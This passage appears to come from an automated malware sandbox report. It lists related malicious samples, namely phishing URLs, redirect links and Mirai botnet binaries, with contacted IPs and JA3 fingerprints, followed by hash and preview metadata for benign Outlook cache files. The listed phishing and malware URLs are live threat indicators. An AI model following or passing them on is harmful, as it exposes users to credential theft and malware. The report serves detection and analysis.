qjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZsGet hashmaliciousMamba2FABrowse
                                                                                                              • 152.199.21.175
                                                                                                              Fanduel CO Player Location Check F.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 192.229.221.95
                                                                                                              https://link.edgepilot.com/s/8e0e5379/EMW5cxymxkqj1qgquAdAJg?u=https://1drv.ms/o/c/67a50aba8b4bc7df/Es0QkMhT9wJGqs_vzb8xaRQBgzED6dWk5_dCMe34N16rYQ?e=5%253aTtRWoI%26sharingv2=true%26fromShare=true%26at=9&c=E,1,DNZ_Csfpwg3nzWxVo2TSq2LzcEM3C6hdkfA-QbvL5dwYrcj0RsSt_vroZV-UqAThZkP5E_WMmdbQ82a_nveA3iNTPpg_CIcQxQFCbK60ykcRIVrxnkr2VnkbdtuE&typo=1Get hashmaliciousUnknownBrowse
                                                                                                              • 152.199.21.175
                                                                                                              https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVzGet hashmaliciousUnknownBrowse
                                                                                                              • 152.199.21.175
                                                                                                              ALVARA-072.msiGet hashmaliciousAteraAgentBrowse
                                                                                                              • 192.229.221.95
                                                                                                              https://www.shareholds.com/eur/9fb868a2-97de-4fa6-bb9a-6e2bdc7c734d/99db7d04-72ba-41ea-a52e-2744d29c7f66/e845cf48-2115-4cda-904c-fc80c835df32/login?id=RDhIaE52RURnRGJHRWUzZ21seVc3R2xwMm5BK0k2NjNKbnlRYisvT3JURnNTa0p4Skp6OTRIVjNPa3VFclFOeEFTY2Jub0tIblFrbGo5SUhWb01RRCt4Q3FtaVlNeno4MU8zN2I3bmlveTF0Tm8yM0FOb1J4THRhM1RqNnhyazNHaDFNV3Zoc1RLN2VpV0ZZbUF2MDlWWGZ2Tk5STVpzUDVKaStnT0l0S1BVTlRzZ2lmcXI1Wkh6M1FheGd3Tjh2NVdaTzVOOTRQaVZrTmZrSjRIK3IvU1p4U2doYSsrYmtUOGl1RytpeGthUGFHT1g4UE4rbngvYnhpRXlJRG9oRVRWbUczdEc1ei9ESFJsT2lpZ2JyOFBLNTNoUXdzdVB0QjhVbmRBN1NSSUJYMTkrRnoxbENHSW5lYnJHczBnQytHaDlQSkRib1NTOFNJeTI2WVhCUkg5NGxNNzNMdzBmWktZenhCR2FnaFFaem5zU3FmbUV6WXowVFdOTEFjU3pGVnRjVlNFOHRtVlkvdk9WQjdibXBTNGZFcjUyb1BYTXRhQTRNNnJjbkJtcz0Get hashmaliciousHTMLPhisher, Microsoft PhishingBrowse
                                                                                                              • 152.199.21.175
                                                                                                              https://u47839971.ct.sendgrid.net/ls/click?upn=u001.SS8YqfWjf1b3UNFf2g8-2BbyepSJ9NnVqTjg5p4PlqyZLDG-2F-2FRHUWKB7tpHO-2BD9IAzfDK69NBor6n5GDDWuKOaXjILtpHrb-2FuqosweWIwJauCFjFOIVaIDje-2BTbWeqpid-2Fe0IpJIrTIznxRC8RuWTXkcZZXZKUxIgeeMWOFH96Tjh3a3uDeIXRyoiB6ZRGKZhHD63OuPdyktyTbMDbA-2FurGQ-3D-3DGlRK_1fgoI9z-2BmeHj6kFR5jmXJyN8Vyo9ja5rNrkl1rR8UXAlmAe6PSc2-2FD85CLOIF98tpCjfsSquWpaRYnYzjD-2B-2FDF-2F8BwiwRSEwmTXwwlDUaQI3bDBZTUv-2Ffbse4A61ed6hVc-2BhhTqdpCqzpir5GY49O-2BVdqG9mHEhTR8OvRsDhxES9QAdY7ZiH-2BurXMNUWGL6VuIIVYma05ZXZK6zhQMDhjNBnJShmRWPp7Ow2IJgH96F8uRyUdyMUZ9au5PfRhmvWMnTj3B1KVxYBpNo7XRlBSlYjK74Z4HptPWz0XAvVILLp4Z5Qq7I-2BYF76YXE5ZsE-2F9hOEdmxnqZwZIEaC1BNDg2XB-2BluEEvEXRuR9ohEPc6VObquUxTQmba8bObSY0wG3oOeb2xD8hV6IKwMnr9d-2B5HbQscEqkWH5k7qnk6bAGBIHHNt95VH4uagG-2Bh74PJCdwHqpitEnC4IeAHXNdNtMkKw34-2BF8TeV7q4SmkRwe9osbefOHPWGyls7sZdEjodVX7wlBDRV2BLQlTlDkK-2FzuZ2EsHCtWTv7yrVJT-2B6p3fl4O5qZGyWAuATjn7386SmbgYFZYAIaRjabXb6J3Z9IYhB-2BBiP3zxZSMd-2BGGNtSLCQw7FqwKOUhYoEZSgG-2FLraJhb7xOSF-2FZGKBw-2FWGPQ5W16K6ZnP31akPWN-2FRy3A1tFL9-2FQXaviWuNn8VOeqLfBR9isxQ-2BqB-2Fm-2BPFRMhM4zyM42FPD-2FRIJxCXHHfAnucSqTKeA1iykI89pw6joYB-2B9v-2FXzQpkgszpTxbxZcZ7mH0xUY6S3QZDaIWpt-2F-2B0FpvTn8cArsTTKjQo1QO476bdWvqqoz32vBNn214xuFkN0blGHeazkhMWwmEzZM6r-2BTFrW2-2Fha62dTAc7eNUguY6HOm3gtrj2-2FYlAidnBTp5Y8fj3jmA-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                              • 152.199.21.175
                                                                                                              Quarantined Messages (1).zipGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 152.199.21.175
                                                                                                              VirtualDesktop.Streamer.Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 152.199.21.175
                                                                                                              AMAZON-02USACTION required to activate your account - bp Supplier Portal.emlGet hashmaliciousUnknownBrowse
                                                                                                              • 108.138.2.127
                                                                                                              http://www.wattpad.comGet hashmaliciousUnknownBrowse
                                                                                                              • 13.32.99.21
                                                                                                              https://docs.google.com/drawings/d/1gvM7ysnJ7zDcSUShXnPoiA6pG4cjDDn9uHRbivsGidA/preview?pli=1jjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZsGet hashmaliciousMamba2FABrowse
                                                                                                              • 18.245.31.5
                                                                                                              (No subject) (92).emlGet hashmaliciousUnknownBrowse
                                                                                                              • 54.187.154.64
                                                                                                              botnet.arm5.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                              • 44.252.140.156
                                                                                                              botnet.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                              • 52.221.152.50
                                                                                                              botnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                              • 54.79.107.211
                                                                                                              botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                              • 13.228.165.201
                                                                                                              botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                              • 65.3.68.55

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              28a2c9bd18a11de089ef85a160da29e4Bill Payment__8084746.htmlGet hashmaliciousUnknownBrowse
                                                                                                              • 150.171.73.254
                                                                                                              • 204.79.197.200
                                                                                                              • 204.79.197.222
                                                                                                              • 23.1.33.206
                                                                                                              • 20.236.24.53
                                                                                                              • 51.104.34.11
                                                                                                              • 184.28.90.27
                                                                                                              • 40.126.31.69
                                                                                                              • 20.12.23.50
                                                                                                              ACTION required to activate your account - bp Supplier Portal.emlGet hashmaliciousUnknownBrowse
                                                                                                              • 150.171.73.254
                                                                                                              • 204.79.197.200
                                                                                                              • 204.79.197.222
                                                                                                              • 23.1.33.206
                                                                                                              • 20.236.24.53
                                                                                                              • 51.104.34.11
                                                                                                              • 184.28.90.27
                                                                                                              • 40.126.31.69
                                                                                                              • 20.12.23.50
                                                                                                              1.zipGet hashmaliciousUnknownBrowse
                                                                                                              • 150.171.73.254
                                                                                                              • 204.79.197.200
                                                                                                              • 204.79.197.222
                                                                                                              • 23.1.33.206
                                                                                                              • 20.236.24.53
                                                                                                              • 51.104.34.11
                                                                                                              • 184.28.90.27
                                                                                                              • 40.126.31.69
                                                                                                              • 20.12.23.50
                                                                                                              (No subject) (92).emlGet hashmaliciousUnknownBrowse
                                                                                                              • 150.171.73.254
                                                                                                              • 204.79.197.200
                                                                                                              • 204.79.197.222
                                                                                                              • 23.1.33.206
                                                                                                              • 20.236.24.53
                                                                                                              • 51.104.34.11
                                                                                                              • 184.28.90.27
                                                                                                              • 40.126.31.69
                                                                                                              • 20.12.23.50
                                                                                                              https://docs.google.com/drawings/d/1agK-6fGF4y65hrPDNlHipoTNyumPU-yxdwKLkQWhsQI/preview?pli=1oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEGet hashmaliciousUnknownBrowse
                                                                                                              • 150.171.73.254
                                                                                                              • 204.79.197.200
                                                                                                              • 204.79.197.222
                                                                                                              • 23.1.33.206
                                                                                                              • 20.236.24.53
                                                                                                              • 51.104.34.11
                                                                                                              • 184.28.90.27
                                                                                                              • 40.126.31.69
                                                                                                              • 20.12.23.50
                                                                                                              http://usps.com-taroper.top/usGet hashmaliciousUnknownBrowse
                                                                                                              • 150.171.73.254
                                                                                                              • 204.79.197.200
                                                                                                              • 204.79.197.222
                                                                                                              • 23.1.33.206
                                                                                                              • 20.236.24.53
                                                                                                              • 51.104.34.11
                                                                                                              • 184.28.90.27
                                                                                                              • 40.126.31.69
                                                                                                              • 20.12.23.50
                                                                                                              http://ERICADLERCLOTHING.comGet hashmaliciousUnknownBrowse
                                                                                                              • 150.171.73.254
                                                                                                              • 204.79.197.200
                                                                                                              • 204.79.197.222
                                                                                                              • 23.1.33.206
                                                                                                              • 20.236.24.53
                                                                                                              • 51.104.34.11
                                                                                                              • 184.28.90.27
                                                                                                              • 40.126.31.69
                                                                                                              • 20.12.23.50
                                                                                                              https://www.google.ca/url?q=nyYhuJkyZc5becm4Aebd&rct=dHYJbECHyHBgmK2d6Hkk&sa=t&esrc=VPIIRnP5TJCWQChPCgwH&source=&cd=TWsylIzvnNqdQKP0bZIw&uact=&url=amp/uniquestarsent.com/ck/bd/BNsT048mrEEHImhtrfrgmcfu/a2Vubml0aC5jYXNlQGFkdmFuY2UtYXV0by5jb20Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 150.171.73.254
                                                                                                              • 204.79.197.200
                                                                                                              • 204.79.197.222
                                                                                                              • 23.1.33.206
                                                                                                              • 20.236.24.53
                                                                                                              • 51.104.34.11
                                                                                                              • 184.28.90.27
                                                                                                              • 40.126.31.69
                                                                                                              • 20.12.23.50
                                                                                                              https://accesspage853.ubpages.com/4k5-ffdfgGet hashmaliciousUnknownBrowse
                                                                                                              • 150.171.73.254
                                                                                                              • 204.79.197.200
                                                                                                              • 204.79.197.222
                                                                                                              • 23.1.33.206
                                                                                                              • 20.236.24.53
                                                                                                              • 51.104.34.11
                                                                                                              • 184.28.90.27
                                                                                                              • 40.126.31.69
                                                                                                              • 20.12.23.50

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):231348
                                                                                                              Entropy (8bit):4.395649034680896
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:Q9gq+SgGBmiGu2bqoQArt0FvN14EskdRp:Q+sBmi2+l4Eskd3
                                                                                                              MD5:FBF196E91FEF75A35AC92D7886408EDE
                                                                                                              SHA1:FC23AA2A3110FE812E0836BFC785D79F9FEDE989
                                                                                                              SHA-256:BB607CCD297E543CA8DE12D0B147CD5B17B443779A6A1C59A9DAC40CCFFE0CCA
                                                                                                              SHA-512:A664AF0D9DE2139B4CAB29A88B8C9AE7D57A95E0C3FB9B4AF870506DFF95A17717440F632E3CAE7FA8F096B738875DCA2AA001C65916A622CB22CE3DC71A228B
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:TH02...... ...r.'......SM01X...,.....zr.'..........IPM.Activity...........h...............h............H..h./......Nv....h.........eu.H..h\cal ...pDat...h....0...0./....h.U....}........h........_`Uk...h^V..@...I.lw...h....H...8.Zk...0....T...............d.........2h...............k..............!h.............. h...1....H./...#h....8.........$h.eu.....8....."hxHW.....XDW...'h..P...........1h.U..<.........0h....4....Zk../h....h.....ZkH..h`.}.p..../...-h .......t./...+h.U....../................. ..............F7..............FIPM.Activity.st.Form.e..Standard.tanJournal Entry.pdIPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.000Microsoft.ofThis form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bin

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):322260
                                                                                                              Entropy (8bit):4.000299760592446
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:dztCFLNyoAHq5Rv2SCtUTnRe4N2+A/3oKBL37GZbTSB+pMZIrh:HMLgvKz9CtgRemO3oUHi3SBSMZIl
                                                                                                              MD5:CC90D669144261B198DEAD45AA266572
                                                                                                              SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
                                                                                                              SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
                                                                                                              SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:51253fe60063c31af0d295afb42228b0:v2:2:1:1590:2:8479:76bd602437550e98c9043d06a55186ab7d95dea5a0e935a599f73e62a8c9b158e0afcb19351f6c353940c06a38172b94d18c02cf92bb8a80184eccca0392b259ab3e71dae73e491c7941997cb36ad4a198661f622dad478d840f66d530a0dde78acea3367f91fff62fbb3dc18faff0c708ad30edef5bea8b22c5fd782b770d8993386eaa784fd19a3c3e1db3b537b1a94d3d4fbd46f8df8fddf6d16611969fe0a97c50e0f3ac24750c93257cf5c161184aa7385800c87d803b339632a3d8ec7fe17a0afd83ce9e9d0e3f7b8d579637928a811f1f7e6d1887df2ddc7d4f752c4d600235e426c92c7bf8a1362f95457998cc0e5d4261f0efa4fada0f866dbcefb407dacab7a2914e91c2f08200f38c2d9d621962145b1464b0f204b326118a53ecdcab22bff005fdd5257c99a6dc51ac0600a49f2ef782396987e78c08b846dad5db55e8ccefffc64863bc2c3e90b95a09d25d0814a848c98fe01a82d4e30e6682dd546e12c45ca0d280a45295ab4bd632dafb070edfdc3c9e38313d5aeb195972986f8011b66817028fd8c78b67a0ac7e780eecc3fb6a31f5a025b8a9a3db278a98c0696aeaac739b18688b0f9c7d751bba02cc5f4e41853fb119b3c0c915059aaa92971244a1989124f12881ca88e6410df70b793a2c3a736ff4

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):10
                                                                                                              Entropy (8bit):2.4464393446710155
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:LM52:r
                                                                                                              MD5:83D1C46019896D3B09C3A90C7E51B605
                                                                                                              SHA1:BF8DA93F388D5AC100741D6E2D5D8A881A867383
                                                                                                              SHA-256:34876F6AF0338D3C84BCF12A35C63EF29756963E9EF8482FE6BF4320913A9B73
                                                                                                              SHA-512:A5A5414B186D1B35E661B02B9E956D7AE4787434C42E409612EC9DBF6BC2D1CB74B10476461324E0F349399811F39129BF42F9B0EA7C47F2EAC5322295A4F4EE
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:1729887709

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\8C6F3B38-A420-461A-850D-087F4A7AAAA1

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):178267
                                                                                                              Entropy (8bit):5.2902716001906835
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:Ri2XfRAqFbH41gwEwLe7HW8QM/o/NMdcAZl1p5ihs7EXXDEAD2Odago:3Ce7HW8QM/o/TXgk9o
                                                                                                              MD5:15DC4FF083F33B3E70409C1808A17EFB
                                                                                                              SHA1:0816611DA4F6720245CD5945D40FB4B80FB0CA96
                                                                                                              SHA-256:340D2F193C0397659C60954F77D50E743C8D456E47C964F459A25FFEA2566E96
                                                                                                              SHA-512:179AC1BD734AC29D7099F17068E64D96F38E1A75426490D148764ED163C97E97C9604ED2023150FC910D0C5C96B219223C2C358355B40454940135384052CB5C
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-10-25T20:21:44">.. Build: 16.0.18209.40127-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4096
                                                                                                              Entropy (8bit):0.09216609452072291
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:lSWFN3l/klslpF/4llfll:l9F8E0/
                                                                                                              MD5:F138A66469C10D5761C6CBB36F2163C3
                                                                                                              SHA1:EEA136206474280549586923B7A4A3C6D5DB1E25
                                                                                                              SHA-256:C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
                                                                                                              SHA-512:9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ .......................................................................... .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-journal

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:SQLite Rollback Journal
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4616
                                                                                                              Entropy (8bit):0.13640804182083316
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:7FEG2l+7ull/FllkpMRgSWbNFl/sl+ltlslVlllfllX:7+/lfg9bNFlEs1EP/n
                                                                                                              MD5:F05C9083052C18BC501DC1C8E580A1D7
                                                                                                              SHA1:393F53E4BCC95FCB0A181D29BB49EEDBE0C3B4D5
                                                                                                              SHA-256:3C17C734A7FEF99B6870EFD51CFE29D6534EA24C1322FA26F55D7DCE6D0FA5DE
                                                                                                              SHA-512:8C0B3DE9C25636D300F34682085CE0FA7A67B70D822A93E456F932FD0D8A84D0207F0883C90629E623F90558711DC0719012BA8FF1326163DC564863387826AC
                                                                                                              Malicious:false
                                                                                                              Preview:.... .c......c&.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ .......................................................................... .................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-shm

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):32768
                                                                                                              Entropy (8bit):0.0447824104283491
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:G4l2RJ5pFm7YAl2RJ5pFmht0L9XXPH4l942U:l2v5py2v5pIS5A0
                                                                                                              MD5:93193F22C12F46BF6168531121F52AA1
                                                                                                              SHA1:59EA09508496205EC1A0D9F66C0327A1F078E9BD
                                                                                                              SHA-256:B31969EE0390BB95FC2918F759A9FB18E7F01D60706206EFDE6CBDD061DADA3E
                                                                                                              SHA-512:C7FD5496CF4C0E7B7EB321CA59ABDFEAF2A4B5A8EC76B637971B0B4EEAA7954BDB0D5A04C041F347E09ABD72670E0F00F690F19247FBE728FC59C369935AEEA8
                                                                                                              Malicious:false
                                                                                                              Preview:..-.......................j72,....Xe.......B...g..-.......................j72,....Xe.......B...g........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-wal

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
